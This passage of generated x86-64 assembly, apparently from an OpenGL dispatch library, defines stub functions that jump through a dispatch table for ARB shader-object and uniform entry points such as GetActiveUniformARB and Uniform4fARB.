call _x86_64_get_dispatch@PLT
movq 4184(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4184(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4184(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4184(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DetachObjectARB), .-GL_PREFIX(DetachObjectARB)
.p2align 4,,15
.globl GL_PREFIX(GetActiveUniformARB)
.type GL_PREFIX(GetActiveUniformARB), @function
GL_PREFIX(GetActiveUniformARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4192(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4192(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4192(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4192(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetActiveUniformARB), .-GL_PREFIX(GetActiveUniformARB)
.p2align 4,,15
.globl GL_PREFIX(GetAttachedObjectsARB)
.type GL_PREFIX(GetAttachedObjectsARB), @function
GL_PREFIX(GetAttachedObjectsARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4200(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4200(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4200(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4200(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetAttachedObjectsARB), .-GL_PREFIX(GetAttachedObjectsARB)
.p2align 4,,15
.globl GL_PREFIX(GetHandleARB)
.type GL_PREFIX(GetHandleARB), @function
GL_PREFIX(GetHandleARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4208(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4208(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4208(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4208(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetHandleARB), .-GL_PREFIX(GetHandleARB)
.p2align 4,,15
.globl GL_PREFIX(GetInfoLogARB)
.type GL_PREFIX(GetInfoLogARB), @function
GL_PREFIX(GetInfoLogARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4216(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4216(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4216(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4216(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetInfoLogARB), .-GL_PREFIX(GetInfoLogARB)
.p2align 4,,15
.globl GL_PREFIX(GetObjectParameterfvARB)
.type GL_PREFIX(GetObjectParameterfvARB), @function
GL_PREFIX(GetObjectParameterfvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4224(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4224(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4224(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4224(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetObjectParameterfvARB), .-GL_PREFIX(GetObjectParameterfvARB)
.p2align 4,,15
.globl GL_PREFIX(GetObjectParameterivARB)
.type GL_PREFIX(GetObjectParameterivARB), @function
GL_PREFIX(GetObjectParameterivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4232(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4232(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4232(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4232(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetObjectParameterivARB), .-GL_PREFIX(GetObjectParameterivARB)
.p2align 4,,15
.globl GL_PREFIX(GetShaderSourceARB)
.type GL_PREFIX(GetShaderSourceARB), @function
GL_PREFIX(GetShaderSourceARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4240(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4240(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4240(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4240(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetShaderSourceARB), .-GL_PREFIX(GetShaderSourceARB)
.p2align 4,,15
.globl GL_PREFIX(GetUniformLocationARB)
.type GL_PREFIX(GetUniformLocationARB), @function
GL_PREFIX(GetUniformLocationARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4248(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4248(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4248(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4248(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetUniformLocationARB), .-GL_PREFIX(GetUniformLocationARB)
.p2align 4,,15
.globl GL_PREFIX(GetUniformfvARB)
.type GL_PREFIX(GetUniformfvARB), @function
GL_PREFIX(GetUniformfvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4256(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4256(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4256(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4256(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetUniformfvARB), .-GL_PREFIX(GetUniformfvARB)
.p2align 4,,15
.globl GL_PREFIX(GetUniformivARB)
.type GL_PREFIX(GetUniformivARB), @function
GL_PREFIX(GetUniformivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4264(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4264(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4264(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4264(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetUniformivARB), .-GL_PREFIX(GetUniformivARB)
.p2align 4,,15
.globl GL_PREFIX(LinkProgramARB)
.type GL_PREFIX(LinkProgramARB), @function
GL_PREFIX(LinkProgramARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4272(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4272(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4272(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4272(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LinkProgramARB), .-GL_PREFIX(LinkProgramARB)
.p2align 4,,15
.globl GL_PREFIX(ShaderSourceARB)
.type GL_PREFIX(ShaderSourceARB), @function
GL_PREFIX(ShaderSourceARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4280(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4280(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4280(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4280(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ShaderSourceARB), .-GL_PREFIX(ShaderSourceARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform1fARB)
.type GL_PREFIX(Uniform1fARB), @function
GL_PREFIX(Uniform1fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4288(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4288(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4288(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4288(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform1fARB), .-GL_PREFIX(Uniform1fARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform1fvARB)
.type GL_PREFIX(Uniform1fvARB), @function
GL_PREFIX(Uniform1fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4296(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4296(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4296(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4296(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform1fvARB), .-GL_PREFIX(Uniform1fvARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform1iARB)
.type GL_PREFIX(Uniform1iARB), @function
GL_PREFIX(Uniform1iARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4304(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4304(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4304(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4304(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform1iARB), .-GL_PREFIX(Uniform1iARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform1ivARB)
.type GL_PREFIX(Uniform1ivARB), @function
GL_PREFIX(Uniform1ivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4312(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4312(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4312(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4312(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform1ivARB), .-GL_PREFIX(Uniform1ivARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform2fARB)
.type GL_PREFIX(Uniform2fARB), @function
GL_PREFIX(Uniform2fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4320(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4320(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4320(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4320(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform2fARB), .-GL_PREFIX(Uniform2fARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform2fvARB)
.type GL_PREFIX(Uniform2fvARB), @function
GL_PREFIX(Uniform2fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4328(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4328(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4328(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4328(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform2fvARB), .-GL_PREFIX(Uniform2fvARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform2iARB)
.type GL_PREFIX(Uniform2iARB), @function
GL_PREFIX(Uniform2iARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4336(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4336(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4336(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4336(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform2iARB), .-GL_PREFIX(Uniform2iARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform2ivARB)
.type GL_PREFIX(Uniform2ivARB), @function
GL_PREFIX(Uniform2ivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4344(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4344(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4344(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4344(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform2ivARB), .-GL_PREFIX(Uniform2ivARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform3fARB)
.type GL_PREFIX(Uniform3fARB), @function
GL_PREFIX(Uniform3fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4352(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 4352(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4352(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 4352(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform3fARB), .-GL_PREFIX(Uniform3fARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform3fvARB)
.type GL_PREFIX(Uniform3fvARB), @function
GL_PREFIX(Uniform3fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4360(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4360(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4360(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4360(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform3fvARB), .-GL_PREFIX(Uniform3fvARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform3iARB)
.type GL_PREFIX(Uniform3iARB), @function
GL_PREFIX(Uniform3iARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4368(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4368(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4368(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4368(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform3iARB), .-GL_PREFIX(Uniform3iARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform3ivARB)
.type GL_PREFIX(Uniform3ivARB), @function
GL_PREFIX(Uniform3ivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4376(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4376(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4376(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4376(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform3ivARB), .-GL_PREFIX(Uniform3ivARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform4fARB)
.type GL_PREFIX(Uniform4fARB), @function
GL_PREFIX(Uniform4fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4384(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _x86_64_get_dispatch@PLT
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 4384(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4384(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _glapi_get_dispatch
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 4384(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform4fARB), .-GL_PREFIX(Uniform4fARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform4fvARB)
.type GL_PREFIX(Uniform4fvARB), @function
GL_PREFIX(Uniform4fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4392(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4392(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4392(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4392(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform4fvARB), .-GL_PREFIX(Uniform4fvARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform4iARB)
.type GL_PREFIX(Uniform4iARB), @function
GL_PREFIX(Uniform4iARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4400(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4400(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4400(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4400(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform4iARB), .-GL_PREFIX(Uniform4iARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform4ivARB)
.type GL_PREFIX(Uniform4ivARB), @function
GL_PREFIX(Uniform4ivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4408(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4408(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4408(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4408(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform4ivARB), .-GL_PREFIX(Uniform4ivARB)
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix2fvARB)
.type GL_PREFIX(UniformMatrix2fvARB), @function
GL_PREFIX(UniformMatrix2fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4416(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4416(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4416(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4416(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix2fvARB), .-GL_PREFIX(UniformMatrix2fvARB)
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix3fvARB)
.type GL_PREFIX(UniformMatrix3fvARB), @function
GL_PREFIX(UniformMatrix3fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4424(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4424(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4424(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4424(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix3fvARB), .-GL_PREFIX(UniformMatrix3fvARB)
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix4fvARB)
.type GL_PREFIX(UniformMatrix4fvARB), @function
GL_PREFIX(UniformMatrix4fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4432(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
